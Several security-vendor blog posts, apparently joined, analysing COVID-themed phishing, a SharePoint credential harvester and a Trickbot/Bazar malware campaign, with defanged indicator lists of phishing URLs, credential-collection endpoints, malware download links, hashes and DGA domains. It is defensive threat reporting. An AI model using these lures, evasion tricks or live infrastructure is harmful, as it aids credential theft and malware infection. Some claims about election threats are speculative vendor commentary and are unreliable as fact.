no-reply@mynetwork[.]unnetflow[.]com

Actor-Controlled Credential Harvesting Sites:

microsoftofficeonlineservices[.]com

outlookprivacypolicy[.]online

office-policy-center[.]com

ms365[.]us

Actor-Compromised Credential Harvesting Sites:

al-abdal[.]net

goatourspackage[.]com

perpustakaanarda[.]papua[.]go[.]id

satoshiation[.]com

simpus3[.]bandungkab[.]go[.]id

theeditorngr[.]com

Links Identified in Phishing Emails:

https://www\[.\]microsoftofficeonlineservices\[.\]com/b/service/?username=\[target email address]

https://login\[.\]microsoftofficeonlineservices\[.\]com?e=\[base64 encoded email]

https://login\[.\]microsoftonlineservices\[.\]office-policy-center\[.\]com/?e=\[base64 encoded target email address]

http://ms365\[.\]us/account-login?e=\[base64 encoded target email address]

https://goatourspackage\[.\]com/?e=\[base64 encoded email]

https://simpus3\[.\]bandungkab\[.\]go\[.\]id/?username=\[base64 encoded email]

https://al-abdal\[.\]net/outlook/test/?e=\[base64 encoded email]

https://satoshiation\[.\]com/?e=\[base64 encoded email]

https://theeditorngr\[.\]com/@?username=\[base64 encoded target email address]

https://perpustakaanarda\[.\]papua\[.\]go\[.\]id?e=\[target email address]

Malicious File Names:

_TOS-Updated_v<8-digit number>.pdf

PDF Policy_v<8-digit number>.pdf

_VoiceMessage<8-digit number>.html

Microsoft-Policy-Updated.pdf

PolicyUpdate.htm

Modified Microsoft Logo Hashes:

MD5:  900b8133ac181eedbbd698ee2a2fabbc

SHA1: 1106889AAA1BAFF9F00904BE335F5A373EE7C059

SHA256: 29256ABAEC0B1325152FC8ADDA5EF62E3BCAE45860A004221EC027321436FEBF

As news reports began to break concerning COVID-19 vaccine distribution, and which groups the highly-coveted initial doses would go to first, malicious actors quickly mobilized phishing messages that exploited a variety of ongoing concerns regarding the vaccine. These attacks ranged from information stealing campaigns to Business Email Compromise (BEC) to operations that aimed to infect victim hosts with malware.

Area 1 Security discovered one such vaccine-themed phishing message in December, amongst a number of similar campaigns making false claims regarding the recently announced vaccine. The attack, which was initially missed by Microsoft Office 365’s spam filters, leverages misinformation about COVID-19 vaccine distribution in an attempt to steal Personally Identifiable Information (PII) from targets, which can then be used for identity theft and other fraudulent activity.

Figure 1 shows the body of the CDC phishing message that the attacker sent to various targeted companies across multiple industries.

Figure 1. Vaccine-Themed Phishing Message Impersonating the CDC

The attacker attempts to solicit sensitive information from the target under the guise of ensuring vaccine availability via a Centers for Disease Control and Prevention (CDC) census-like form. The implication is that filling out the linked form is necessary to secure a spot on the vaccine distribution list.

Seen in Figure 2, the next wave of this campaign engages in brand spoofing with a new and improved graphic to imitate pharmaceutical and vaccine manufacturer Pfizer in addition to using the CDC logo. This comes as no surprise, as impersonation of Pfizer and the CDC is all too common amid the current nationwide roll-out of the COVID-19 vaccine.

Figure 2. Vaccine-Themed Phishing Message with Pfizer Brand Spoof

To dupe targets into trusting this fraudulent email, the attacker used Display Name Spoofing to make the message appear as if it was sent from within the targeted company. More specifically, the visible FROM address is tailored to include the targeted organization’s domain name followed by the words “Secured Mail.”

An internal email of this nature is not so unordinary these days, especially given many companies have now established a COVID-19 designated information channel for their employees, including email accounts created specifically for communicating COVID-19 issues and updates. But this alone is hardly enough to bypass your typical anti-spoofing technology. To go the distance, the attacker utilized much more evasive techniques.

When inspecting the raw email headers, the SMTP Envelope 'MAIL From' address might have you believe the message originated from a legitimate domain, albeit one not related to the targeted company, Pfizer nor the CDC. To carry out this devious tactic, it appears the attacker inserted an SMTP HELO command telling the receiving email server that the message originated from this legitimate domain, when — in actuality, it originated from a completely unrelated IP address: 184[.]80[.]233[.]138.

Further research into this spoofed ‘Envelope From’ domain unveiled the reasoning behind the attacker’s deceptive approach. This particular domain’s owner did not configure SPF, DKIM or DMARC — email authentication protocols leveraged, at least in part, by most email security solutions to help identify phishing messages.

What’s more, the spoofed domain had been taken offline some months before this campaign was launched, and thus no longer resolved to an IP address. So when the attacker sent their malicious emails from 184[.]80[.]233[.]138, there were no authentication protocols in place to tip the targeted companies to any suspicious activity.

In true cyber criminal fashion, the ruse does not end with this clever use of 184[.]80[.]233[.]138. The fraudsters sent from this particular IP address because it belongs to another legitimate business and therefore does not carry a bad reputation. Hence, no spam filters or blocklists of any kind will flag this otherwise benign IP.

It’s clear the attacker went the distance to evade phishing detection. In a very calculated manner they:

• Used Display Name Spoofing to fake the visible FROM header

• Inserted an SMTP HELO command to spoof the Envelope From domain

• Chose to spoof a domain that did not have email authentication protocols configured and that no longer resolved to an IP address

• Compromised a legitimate host with a benign IP, and used it to launch their phishing attack

Traditional defenses will continually miss phish like this. In fact, the messages for this campaign successfully passed through Microsoft’s Office 365 native defenses before being identified and stopped by Area 1.

In order to complete the purported contact form for receiving the COVID-19 vaccine, the target is prompted to click on the “COVID19 CDC Count” or “Yes / No” button in the message body. Clicking this link will result in the target’s browser loading the malicious webpage hxxps://mail10298[.]buzz/covid/index.php.

This phishing website, shown below in Figure 3, lures the victim into entering sensitive information, such as their physical address and driver’s license number. Once provided, the attacker could easily steal the victim’s identity or use the information to enable a range of fraudulent schemes.

Interestingly enough, the attacker misspells vaccine as “vassine,” indicating English is likely not their native language.

Figure 3. “CDC” Contact Phishing Form

The domain for the phishing website, mail10298[.]buzz, was registered within 24 hours of the phishing campaign’s debut. This quick turnaround is a common tactic employed by threat actors hoping to bait as many victims as possible before their newly registered domain (NRD) is identified as phishing infrastructure.

NRDs are consistently used by attackers to fool users into taking actions that jeopardize the security of their organization. Leveraging NRDs is also a common, and particularly effective, attacker technique to circumvent an email security gateway. New domains have very little history or presence, which allows them to bypass typical blocklists and reputation filters. In fact, a significant number of campaigns that Area 1 Security catches leverage new domains, which are often ephemeral (active only for about 48 hours or less).

After performing a DNS lookup on mail10298[.]buzz, and a WHOIS search on the resultant IP address (102[.]130[.]119[.]118), Area 1 found that the attacker used a Virtual Private Server (VPS) service based in Cape Town, South Africa. There were several dozen additional domains that resolved to the same IP address that may also potentially be in use by the attacker. These domains follow a similar pattern, each having a mail-themed second-level domain that contains a random 4-6 digit sequence. However, at the time of our research, these sites had either been parked or taken offline.

Further investigation of the domain for the phishing website resulted in identification of five subdomains, revealing the domain owner’s use of cPanel:

• cpanel[.]mail10298[.]buzz

• cpcalendars[.]mail10298[.]buzz

• cpcontacts[.]mail10298[.]buzz

• webdisk[.]mail10298[.]buzz

• webmail[.]mail10298[.]buzz

cPanel is a web hosting control panel that allows end users to easily manage their websites. All of the domains noted above are default service subdomains for mail10298[.]buzz and were automatically generated by cPanel. Given the creation date for the domains was less than a day before the phishing campaign was underway, it’s safe to assume that the attacker is likely the owner of mail10298[.]buzz.

However, legitimate sites using cPanel can also be leveraged in phishing attacks. These sites are often the target of various hacks, including compromise via cPanel-themed phishing attacks. Compromised cPanel sites can then be used to further more elaborate social engineering scams.

Gaining unauthorized access to legitimate cPanel accounts provides a stealthy avenue for leveraging benign domains in email-borne attacks, helping to better evade phishing protection solutions.

Navigating directly to hxxp://mail10298[.]buzz exposed an OPSEC blunder by the attacker — an open directory of the phishing website, as shown in Figure 4.

Figure 4. Index of “CDC” COVID-19 Website

The main index for the site was publicly available and conveniently contained the archive “covid.zip”. Stored in this ZIP archive were files containing fairly basic HTML and PHP scripts.

One file in particular caught our interest: process.php. This script, a portion of which is shown below in Figure 5, was most likely taken from open source code for processing HTML forms  using PHP. This is evident in the extensive commenting and default values that still remain in the script.

Figure 5. Portion of process.php Script

If a victim submits the information they entered on the form, process.php triggers an HTTP GET request to a generic PHP mailer, which then sends the victim’s information to the attacker, including the victim host’s IP address.

To thwart these devious vaccine-themed phish, Area 1 Security uses multiple advanced anti-phishing techniques that:

• Leverage insight gained from early identification of attacker campaign infrastructure, enabling superior detection of emails from spoofed domains and accounts;

• Analyze email for threat indicators, such as recently registered domains, domain name obfuscation, and look-a-like domains; and

• Use real-time correlation with associated brand infrastructure to verify authenticity

Area 1 also uses lexical analysis of message body and subject to detect attacks aimed at stealing sensitive information. To find phish, our technology goes beyond validation of SPF, DKIM and DMARC records. Using preemptive threat hunting and a broad set of proprietary analysis techniques, Area 1 identifies phishing campaigns, including those with malicious newly registered domains, that other defenses miss.

Area 1 Security‘s advanced Machine Learning and Artificial Intelligence technology allow our algorithms to uncover the clever tactics seen in this campaign, enabling us to block the messages in real-time instead of waiting days or weeks for signature updates. Our time-zero detections lead the industry with reliable verdicts that stop phishing attempts at delivery time.

Phishing Link:

hxxps://mail10298[.]buzz/covid/index.php

Phishing Domain and Subdomains:

mail10298[.]buzz

cpanel[.]mail10298[.]buzz

cpcalendars[.]mail10298[.]buzz

cpcontacts[.]mail10298[.]buzz

webdisk[.]mail10298[.]buzz

webmail[.]mail10298[.]buzz

Sender IP:

102[.]130[.]119[.]118

PHP Script:

process.php (SHA256 hash: f2023582408358590d9e1576422b5c13addfa740d0d3c9afd46c0982e45d1149)

Website Image Containing Misspelled Word “Vassine”:

logo.png (SHA256 hash: 5fd24dca599cc5220e7ea7271a89ea660c9d769177e4f07a0cd7d0fa485f9ffa)

In August, Area 1 Security researchers identified a Microsoft SharePoint phishing campaign that abused cloud computing services, such as Azure Web Sites, Google Storage, and Amazon Web Services, to host credential harvesters. Most recently, our researchers detected an updated wave of Microsoft SharePoint phish that are leveraging new COVID-19 restrictions to steal victims’ login information.

While this new COVID-19 phishing campaign is incredibly widespread, Area 1 Security noted that a majority of the targets included upper-level management and executives. The attacker may be focusing the bulk of the attacks on these individuals in order to have a better chance of gaining access to sensitive information and potentially infiltrating the target network.

This new campaign deviates from the previous “Summer Bonus” Microsoft Office 365 phishing campaign by attempting to trick targets into thinking they missed an important update to COVID-19 procedures. As seen in Figure 1, the attacker states that a purported SharePoint-hosted document was sent a week prior, creating a sense of urgency in order to lure targets into clicking on the provided link.

Figure 1. SharePoint Phishing Email

The new COVID-19 campaign contains many of the same hallmarks as the previous bonus-themed phish, such as tailoring each message to include the target’s email and company name throughout the body of the message and in the spoofed sender address. However, this time around, the attacker improved upon their formatting to appear more convincing.

As with the previous PhishPoint campaign, the attacker continues to use Virtual Private Servers (VPS) to send their phishing messages. Area 1 Security researchers identified roughly 100 unique sender addresses associated with this “COVID Requirements” campaign. The attacker used three main VPS services - CrownCloud, HostWinds, and MGNHost.

The versatility of a VPS allows the attacker to remain anonymous and also provides the ability to continually pivot to new infrastructure as soon as a phishing domain or IP address is identified as malicious.

To a lesser extent, the attackers also sent the phishing messages through a leading transactional and marketing email provider, SendGrid. This company is known for their presence, experience and expertise in email delivery. As a result, SendGrid’s domain is commonly whitelisted. For this reason, threat actors will often launch their phishing campaigns by abusing reputable providers like this.

Not only that, but with SendGrid, the message will easily pass email authentication. This demonstrates just how DMARC fails at stopping phishing attacks.

The use of SendGrid is also a clever way to circumvent Secure Email Gateways (SEGs). SEGs that predominantly depend on email authentication and sender reputation (SPF, DKIM, DMARC) will completely miss these types of phishing attacks.

Disguised as a simple “Open” button, the link in the message body leads to a spoofed Microsoft login page hosted on various cloud computing platforms, including Amazon Web Services, Google’s Appspot engine, and Firebase. These top tier, widely-used cloud services provide attackers the perfect platform for hosting their malicious content, all the while flying under the radar of legacy vendor email security solutions.

An example link, hxxps://x9n44x9nvc9nn9a4l9xa4cds[.]df[.]r[.]appspot[.]com/#redacted@redacted.com, shown in the address bar in Figure 2, further demonstrates the targeted nature of the attacks. The redacted information in the URL contains the target’s company email address. To further add legitimacy, this spoofed site is nearly identical to the real Microsoft login page. The only discernible difference is the inclusion of the word “Outlook.”

Figure 2. Spoofed Microsoft Login Portal

Figure 3 shows a portion of the source code of the spoofed login page. This section of code consists of JavaScript that attempts to mimic the functionality of the legitimate Microsoft login page.

Figure 3. JavaScript of Spoofed Login Page

The code calls a custom function responsible for extracting the victim’s email from the URL and prepopulating it in the account username field. In this function the actor left a portion of commented code (presumably used by the developer of the code for testing purposes) as highlighted in Figure 4.

Figure 4. Custom Function Containing Commented Code

The commented code specifies a link that contains the string “office1withemail” in the URL path. Pivoting on this code, Area 1 Security researchers identified a massive number of phishing attacks, dating back to at least April 2019. These attacks leveraged a large variety of phishing themes, used numerous cloud hosting and VPS providers to send the messages, and targeted a slew of industry verticals.

It's possible these attacks are the work of a single group. However, given the nature and pervasiveness of the activity - and the fact that all of the attacks used JavaScript that contained the same commented code - a phishing kit may be at play.

If the target enters their password, it is posted to a website hosted on Microsoft Azure Web Sites, for example hxxps://fajal2a2l0jj0ccf2lf020jf[.]azurewebsites[.]net/handler[.]php, as revealed in Figure 5.

Figure 5. HTTP Post of Victim Credentials

After the credentials are entered, the .ldsddddd function above displays a spinning circle next to the “Sign In” button, making it appear as if the credentials are being validated. After several seconds have passed, the error message shown in Figure 6 is displayed.

Figure 6. Error Message Displayed After Credentials Are Entered

No matter what value is entered, the victim is led to believe they provided an incorrect password. To reduce suspicion, if the victim clicks on the “Forgot my password” link, the browser redirects to the real Microsoft password reset page.

This pervasive “COVID Restrictions” campaign is an ongoing threat to many individuals and businesses alike. The use of VPS and leading email service providers, as well as abuse of multiple cloud services throughout several stages of the attack, make it a particularly difficult campaign to detect.

To make matters worse, because the URLs used in the attacks point to legitimate domains and the messages contain no malicious payloads, traditional defenses will continually miss phish like this. In fact, Microsoft’s native Office 365 email security failed to stop this phishing attack despite these red flags.

Fortunately, Area 1 Security detected this stealthy campaign and stopped these phish from reaching our customers’ inboxes.

Area 1 Security‘s advanced Machine Learning and Artificial Intelligence technology allow our algorithms to uncover new tactics malicious actors are using to bypass legacy vendors and cloud email providers in real-time versus waiting days or weeks for signature updates. Our time-zero detections lead the industry with reliable verdicts that stop phishing attempts at delivery time. This has many advantages over post-delivery retraction in that the user is never exposed to the attack.

Malicious Links:

hxxps://pidbbhitbt8007dtdhdlbhhp[.]azurewebsites[.]net/handler[.]php

hxxps://fajal2a2l0jj0ccf2lf020jf[.]azurewebsites[.]net/handler[.]php

hxxps://03ssrd3334phd00p4sh0s33drcorequemenxxkjw3450w1jklsha[.]s3-ap-southeast-1[.]amazonaws[.]com/index[.]html#@<targeted_company_domain>

hxxps://owacovctctsttc00tscqcqts0c1tq[.]s3-ap-northeast-1[.]amazonaws[.]com/index[.]html#@<targeted_company_domain>

hxxps://s3-ap-northeast-1[.]amazonaws[.]com/cxrequirement[.]sharepointeseugwpjlmahxedgkqsbjlzfgsn/index[.]html#@<targeted_company_domain>

hxxps://storage[.]cloud[.]google[.]com/owa9y0y90yh9y9ffy2990hfy90h[.]appspot[.]com/index[.]html#@<targeted_company_domain>

hxxps://storage[.]cloud[.]google[.]com/sharedpoinnlinej27pj07jjppl7jp[.]appspot[.]com/index[.]html#@<targeted_company_domain>

hxxps://storage[.]cloud[.]google[.]com/sharedpointoneqqnfcefoqi0e6cf[.]appspot[.]com/index[.]html#@<targeted_company_domain>

hxxps://storage[.]cloud[.]google[.]com/sharedpointowauthdhljd1l0tdka0[.]appspot[.]com/index[.]html#@<targeted_company_domain>

hxxps://storage[.]cloud[.]google[.]com/shonecov19dn1n1lnfflnbfblf1d[.]appspot[.]com/index[.]html#@<targeted_company_domain>

hxxps://tlook-off365-signin[.]web[.]app/#@<targeted_company_domain>

hxxps://x9n44x9nvc9nn9a4l9xa4cds[.]df[.]r[.]appspot[.]com/#@<targeted_company_domain>

hxxps://y02hh200222fyhffh90yhyhh[.]s3[.]us-east-2[.]amazonaws[.]com/index[.]html?eid=@<targeted_company_domain>

hxxp://d-nb[.]xyz/?e=@<targeted_company_domain>

Malicious Sites:

pidbbhitbt8007dtdhdlbhhp[.]azurewebsites[.]net

fajal2a2l0jj0ccf2lf020jf[.]azurewebsites[.]net

03ssrd3334phd00p4sh0s33drcorequemenxxkjw3450w1jklsha[.]s3-ap-southeast-1[.]amazonaws[.]com

owacovctctsttc00tscqcqts0c1tq[.]s3-ap-northeast-1[.]amazonaws[.]com

y02hh200222fyhffh90yhyhh[.]s3[.]us-east-2[.]amazonaws[.]com

s3-ap-northeast-1[.]amazonaws[.]com/cxrequirement[.]sharepointeseugwpjlmahxedgkqsbjlzfgsn

storage[.]cloud[.]google[.]com/owa9y0y90yh9y9ffy2990hfy90h[.]appspot[.]com

storage[.]cloud[.]google[.]com/sharedpoinnlinej27pj07jjppl7jp[.]appspot[.]com

storage[.]cloud[.]google[.]com/sharedpointoneqqnfcefoqi0e6cf[.]appspot[.]com

storage[.]cloud[.]google[.]com/sharedpointowauthdhljd1l0tdka0[.]appspot[.]com

storage[.]cloud[.]google[.]com/shonecov19dn1n1lnfflnbfblf1d[.]appspot[.]com

x9n44x9nvc9nn9a4l9xa4cds[.]df[.]r[.]appspot[.]com

tlook-off365-signin[.]web[.]app

d-nb[.]xyz

“You’re fired……NOT!” An ongoing and rapidly evolving spear phishing campaign, hitting companies across industry verticals, is threatening targets with false claims of employment termination due to economic impacts from the global pandemic, among numerous other coercive tactics. The goal of the attacker is to intimidate employees into clicking on a link that will ultimately lead to Bazar or Buer malware infections by way of Trickbot.

Researchers at Zscaler ThreatLabZ noted this is the first time they have seen the two malware strains together. Additionally, they have associated this attack with the Trickbot gang, known to use a combination of different malware groups and bots to conduct attacks.

While Trickbot started out as a banking trojan, known for hijacking victims’ browser sessions once logged into their banking website, it has since been repeatedly repurposed for other objectives, including the ability to spread ransomware. This particularly maniacal and disruptive aspect of Trickbot functionality makes it a top contender for possible threats to the upcoming 2020 presidential election.

With ransomware as an option, Trickbot poses a significant threat to U.S. election infrastructure. The malware’s operators have the ability to compromise a massive number of voting machines during critical times in vote counting, undermining trust in the result. That, or they may even be able to disrupt the voting process altogether by affecting entire voting locations, preventing large portions of the voter population from casting their ballots.

This could explain the recent wave of Trickbot takedown efforts. A report from KrebsonSecurity provided details of an operation that likely began on September 22nd and is conjectured to be a government counterstrike against the actors behind Trickbot. This activity, first identified by Intel471 and possibly conducted by the U.S. Cyber Command, attempted to disrupt Trickbot infrastructure by forcing the botnet’s controllers to issue bogus configurations.

These configurations swapped real controller IP addresses for the localhost address (127.0.0.1), preventing bots from calling home to receive commands. Not long after the phony configurations were sent, all known controllers appeared to have stopped properly responding to bot requests, suggesting the overall activity was a concerted, intentional effort to disrupt this pervasive botnet’s operations.

Another attempt was made on October 1st, presumably by U.S. Cyber Command, that similarly altered the controller IP addresses needed to receive commands. Compounding the effects of this effort, Microsoft also attempted disruptions of Trickbot infrastructure by obtaining a court order to disable the botnet’s IP addresses, among other actions. Most recently, Microsoft issued an update that they successfully took down 62 of the 69 Trickbot servers around the world with the remaining being unorthodox IOT devices.

However, these attempts reportedly would only have a short-term effect on Trickbot controllers since its operators use decentralized infrastructure that communicates over Tor, with blockchain-based EmerDNS as a fallback that is resistant to takedowns. Additionally, Ars Technica reports that Trickbot controllers are beginning to host their malware on other e-criminals’ servers.

Unsurprisingly, not long after the various Trickbot takedown operations occurred, Area 1 Security identified a prolific phishing campaign that intended to spread Bazar and Buer payloads via Trickbot. Worse yet, this newer stealthy malware in Trickbot gang’s arsenal of tools can be used to deploy additional malware, including ransomware.

Area 1 Security researchers found evidence that the Bazar loader dropped in this campaign will not continue with the infection if the locale of the victim’s device is in Russia, a common tactic seen with Trickbot. In fact, Cyber security researchers believe Trickbot is the handiwork of cybercriminals operating out of Russia. Since at least 2019, this group has been responsible for a surge in ransomware attacks targeting schools systems, local governments and even law enforcement agencies in the United States.

While these e-criminal groups have always been operating at some level in recent years, their activity has surged in the lead-up to the 2020 Presidential election. This suggests that entities involved in the U.S. election are prime targets for foreign adversaries, both nation-state and cybercriminal groups alike.

Lining up with the recent FBI/DNI press conference, Russian and Iranian state-sponsored groups are confirmed to have exfiltrated voter registration information. Additionally, these nations are behind separate email spoofing campaigns designed to undermine faith in the U.S. election.

At the moment, it is unclear if the phishing campaign that Area 1 Security identified is being carried out by any of these groups or if it is purposefully targeting election administrators. Regardless, state and local election administrators should be extra vigilant as they tend to be highly vulnerable to phishing attacks, as highlighted in a recent Area 1 Security phishing report.

This campaign employs a number of lures that threaten job security in order to intimidate targets into clicking on the provided URL. The phishing messages are very simple in their demand and appear to originate from persons of authority within the targeted company, as seen in Figure 1.

Figure 1. Phishing Messages That Threaten Job Security

The messages identified in this campaign are based on eliciting fear from the target audience, focusing on either employment termination or customer complaints. The current work-from-home operating model, and the resultant decrease in face-to-face contact, gives attackers the advantage by making email delivery of these types of “employment notifications” all the more believable.

Targets of this campaign could potentially believe that the post COVID shake up in their organizations is the reason they’re being let go. With many businesses closing down unusable office space, combined with an economic recession, there is enough plausibility for this wide-ranging attack to fool employees into believing that their position may be part of the now all-too-common budget cuts.

It's possible this Bazar and Buer campaign is part of the Trickbot operations that Microsoft and other partners are trying to defeat. If so, the activity Area 1 Security observed only further proves just how difficult it can be to counteract these complex operations. A litany of unique and ever-changing email accounts and IP addresses are at the threat actor's disposal. Despite the previously mentioned efforts to neutralize Trickbot controllers, the infrastructure used to support this particular campaign (if associated in any way) was hardly affected, where the attacker seems to have promptly resumed operations.

While disruption operations may have worked a decade ago, the Trickbot gang and other groups that rely on their Malware-as-a-Service (MaaS) offering are equipped with the necessary skills to continue their attacks without a hitch. Current botnets have all the professionalism of any IT company. They’re able to manage disruptions and bring back services with continuity planning, backups, automated deployment, and a dedicated workforce.

The campaign noted above centered on termination-related documents available at a provided URL. When clicked, the link directs the victim’s browser to either Google Docs or Constant Contact. By not attaching the malware as a file to the email, the attacker is able to bypass file scanning detections. Moreover, the use of common cloud-based hosting services allows the attacker to circumvent URL scanning techniques, as well as enables them to easily create new malicious links in the event that their URLs are identified as phishing pages.

The Google Docs or Constant Contact link in the email leads to a decoy preview page, as shown in Figure 2, that prompts the victim to open a list of terminated employees. The decoy also cleverly displays the often seen “If download does not start, click here”.  This link is where the malware is actually being hosted.

Figure 2. Google Doc Decoy Preview Page with Redirect Link

As seen in the figure below, after clicking on the link found in the online document, the victim is presented with a dialog box to run the file. The file is actually a malicious PE32+ executable that is designed to run on all Windows systems.

Figure 3. Gaining Run Permission

After clicking “Run”, a series of events will take place on the victim’s device that will ultimately lead to installation of the Bazar backdoor or Buer loader.

First, the PE32+ executable noted above will decrypt the payload using an RC4 cipher, a portion of which is provided in Figure 4 below. The payload happens to be none other than Trickbot, and a different RC4 key is used for each iteration of the malware.

Figure 4. RC4 decryption of Trickbot Payload

As detailed in Figure 5, Area 1 Security researchers identified the string “dave” at the end of the Trickbot payload in memory, which is consistent with prior reporting on techniques employed by Emotet and Trickbot malware developers. This string reveals the attacker’s use of a custom packer to compress and encrypt the file, making it difficult for malware analysts to reverse engineer the payload.

Figure 5. “Dave” signature

Despite this anti-reversing technique, Area 1 Security discovered the Trickbot payload attempts to further infect the victim device by decrypting and running the BazarLoader. Loaders are an essential function that allow attackers to gain a foothold in a network and enable subsequent, more persistent infection via their command and control servers. This tactic opts for stealth by initially loading as little functionality as necessary.

In this case, the BazarLoader in turn attempts to download the Bazar backdoor via a blockchain dns lookup table. This is a great tactic for attackers as it circumvents the need for traditional ISPs. Similar to bitcoin, Top Level Domains (TLDs) like .bit, .bazar, and .coin are not owned by a single authority but instead shared over peer-to-peer networks. This offers users the ability to bypass censorship and other government restrictions, but also provides a platform for attackers to conduct illicit activities that are safe from countermeasures.

As shown in Figure 6, to download the backdoor, the loader loops through eight unique IP addresses and five domains under the EmerDNS .bazar TLD.

Figure 6. Outbound Connections to Download the Bazar Backdoor

The second level domains are comprised of 12 alphabetical characters that are generated using a specific domain generation algorithm. The malware runs through the list of generated .bazar domains to find one that is still actively hosting the backdoor.

Once the backdoor is downloaded and successfully run, that attacker can carry out any number of devious acts, including remotely executing commands, exfiltrating sensitive data, and deploying other payloads. These additional payloads range anywhere from post-exploitation frameworks like CobaltStrike to ransomware like Ryuk.

In fact, Trickbot is known to deliver Ryuk ransomware to devices via BazarLoader. In one instance, after the initial Bazar infection, attackers exploited a recently disclosed vulnerability to escalate privileges and gain domain-wide ransomware infection just 5 hours after sending their phishing message. This is unfortunately just one of many possible outcomes that can result from successful infection via the phishing campaign Area 1 Security has observed.

By leveraging a number of stealthy techniques, the threat actors behind this campaign have been able to easily evade legacy vendors and cloud email providers. Linking to legitimate, cloud-based sites within the phishing messages, combined with the use of takedown- and sinkhole-resistant EmerDNS TLDs, makes this a particularly difficult campaign to detect.

Area 1 Security‘s advanced Machine Learning and Artificial Intelligence technology allow our algorithms to uncover the clever tactics seen in this campaign, enabling us to block the messages in real time versus waiting days or weeks for signature updates. Our time-zero detections lead the industry with reliable verdicts that stop phishing attempts at delivery time. This means malware like Trickbot, the Bazar backdoor, and follow-on infection with ransomware, never have the opportunity to make their way onto our customers’ devices. Our solution has many advantages over post-delivery retraction in that the user is never exposed to the attack.

Phishing Email Subject Lines:

Re: Termination List

RE: termination,

Re: my visit and call

Re: meeting of

RE: office

RE: office,

Malicious PE32+ Executable Linked to in Decoy Document:

Sha1: 895d84fc6015a9ad8d1507a99fb44350fb462c79

Sha256: a3b2528b5e31ab1b82e68247a90ddce9a1237b2994ec739beb096f71d58e3d5b

Md5: dbdb5ddd07075b5b607460ea441cea19

Sites Hosting Malicious PE32+ Executable:

hxxps://tees321[.]com/Document3-90[.]exe

hxxps://centraldispatchinc[.]com/Report10-13[.]exe

hxxps://www[.]4rentorlando[.]com/Text_Report[.]exe

Malicious Links in Phishing Messages:

hxxps://files.constantcontact.com/0d2efd83801/50f95d03-8af1-4396-ac84-d6a7f1212026.pdf

hxxps://docs[.]google[.]com/document/d/e/2PACX-1vQzFpGbLRNSIpbklM51_9P78DJbhxmMLeMzQUJxX9roupKMn3xYX1ZBEjP2Jo5_CHbzoqIdVnwPeazU/pub

hxxps://docs[.]google[.]com/document/d/e/2PACX-1vRhLU8Ar86crHTwsP7rSyStmTABnsPtQ4q3Mic9UIZN-hz06cO8fuzsiiEus9seLQHDU4T51YGcejNU/pub

hxxps://docs[.]google[.]com/document/d/e/2PACX-1vTVCHKzmdSD2wX03GTnyBToo4xvldfGqtFWZiz5bT5cTRozW4Xk5H6GER0GmscSPqnpyFtokphDl-_U/pub

hxxps://files[.]constantcontact[.]com/5e536f60101/8c5d270a-897a-4ac8-845a-86c920bf229c[.]pdf

hxxps://files[.]constantcontact[.]com/defde16c001/0aa90d3a-932f-4343-8661-22e4f6488705[.]pdf

hxxps://docs[.]google[.]com/document/d/e/2PACX-1vSlUktRROV3hU60c_n8LWFpOQBdyJj-N10g4tn14hBfmdaiRGKL9rc4vnTRYdLErwU0AHt7WwbzwU9q/pub

hxxps://docs[.]google[.]com/document/d/e/2PACX-1vRFLfuWRihaQHjGEPs8-Dm7Y3VxEFRpiUJuJmD9Vm6y3xVSSG9Vc3XxRnbyHQzIoWQ_5REbdDbkOq0s/pub

Outbound BazarLoader DNS Requests (Port 53):

95[.]174[.]65[.]241:53

195[.]16[.]195[.]195:53

192[.]71[.]245[.]208:53

176[.]126[.]70[.]119:53

151[.]80[.]222[.]79:53

94[.]16[.]114[.]254:53

193[.]183[.]98[.]66:53

51[.]254[.]25[.]115:53

Blockchain Domains:

bdfgimbfhgio[.]bazar

dcehjldeghjn[.]bazar

bdfgjlbfhgjn[.]bazar

adehklafghkn[.]bazar

ceggilcgigin[.]bazar

In less than two weeks on 3 November 2020, the United States of America will hold its quadrennial Presidential election. Concerns over cybersecurity protections and processes implemented over the preceding four years remain high, as reports of foreign interference, infrastructure vulnerabilities, and failed preparedness continue to abound.

Area 1 Security outlined the risks posed by threat actors to election administrators and their email security controls in a recent report; and we continue to analyze the baseline security practices as the nation prepares for the elections.

Just this week on Monday, 19 October 2020, the website for Orange County, Florida’s Supervisor of Elections was down. Florida’s fifth-most populous county failed to properly re-register their domain, something that was luckily resolved without incident. Four more election sensitive domains are set to expire before Election Day on 3 November 2020:

albanywi.org 2020-10-22T15:48:51Z

bcn.net 2020-10-27T04:00:00Z

chesternh.org 2020-11-01T21:06:59.000Z

bethlehemnh.org 2020-11-02T14:07:25Z

And another 20 are set to expire before the year’s end, which could be critical if outcomes are not determined or remain in question before inauguration day on 20 January 2021.

arwhlaw.com 2020-11-10T05:00:00Z

cityofcumberland.net 2020-11-13T16:46:49Z

burnetcountytexas.org 2020-11-14T00:01:15Z

antwerptownship.com 2020-11-14T22:28:21Z

bessemermi.org 2020-11-15T23:58:58Z

carsoncitymi.com 2020-11-16T16:13:58Z

carrollcountyga.com 2020-11-17T18:13:46Z

buttscounty.org 2020-11-21T18:40:57.00Z

bridgeportmi.org 2020-11-21T19:20:24Z

ci.superior.wi.us 2020-11-27T23:59:59Z

bentcounty.net 2020-12-04T15:43:00Z

cityofbr.org 2020-12-06T17:31:36Z

birchruntwp.com 2020-12-16T11:25:06Z

ci.emporia.va.us 2020-12-18T23:59:59Z

hardeecountyelections.com 2020-12-20T11:59:59Z

barrecity.org 2020-12-23T17:34:03Z

alphacomm.net 2020-12-24T05:00:00Z

andersoncountyks.org 2020-12-26T16:10:34.000Z

broomecounty.us 2020-12-27T23:59:59Z

hcnj.us 2020-12-29T23:59:59Z

An extensive list of election sensitive domain registrations is provided here.

Failure for any organization to properly register their domains poses several key risks:

1. Anyone who might register an election-sensitive domain would be able to assume the identity of elections officials and send phishing emails.

2. Critical voter information could be removed from the internet or changed.

• Vote!

• Domain owners should check the expiration dates of their domains and immediately make sure they are secured for the maximum ownership time available

• Observe the recommendations for securing email in the prior “Phishing Election Administrators” report outlining the risks to election administrators and officials.

Mark your calendars, October 13-14 is Amazon’s Prime Day! A whole 24 hours of exclusive deals just for Prime members. For most of us who haven’t been impulsively buying during the quarantine after spending all day sitting on our laptops, this means it might be time to open up Amazon and check out the latest deals.

However, cyber criminals have also prepared for what may likely be the biggest Prime Day ever. Each year, they ramp up their Amazon phishing schemes, to steal login credentials and credit card details with convincing lures regarding Prime membership.

